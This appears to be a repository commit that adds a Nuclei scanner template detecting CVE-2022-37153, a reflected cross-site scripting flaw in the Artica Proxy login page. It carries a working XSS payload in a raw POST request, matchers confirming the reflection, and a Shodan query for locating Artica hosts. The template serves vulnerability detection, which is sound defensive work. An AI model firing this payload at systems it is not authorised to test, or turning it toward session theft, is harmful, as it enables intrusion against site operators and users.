commit
c655e4c60d
|
@ -0,0 +1,44 @@
|
||||||
|
id: CVE-2022-37153
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Artica Proxy - Cross Site Scripting
|
||||||
|
author: arafatansari
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
An issue was discovered in Artica Proxy 4.30.000000. There is a XSS vulnerability via the password parameter in /fw.login.php.
|
||||||
|
reference:
|
||||||
|
- https://github.com/Fjowel/CVE-2022-37153
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-37153
|
||||||
|
classification:
|
||||||
|
cve-id: CVE-2022-37153
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.html:"Artica"
|
||||||
|
tags: cve,cve2022,xss,artica
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /fw.login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
userfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'Password" value="admin"><script>alert(document.domain)</script>'
|
||||||
|
- 'Artica Web'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue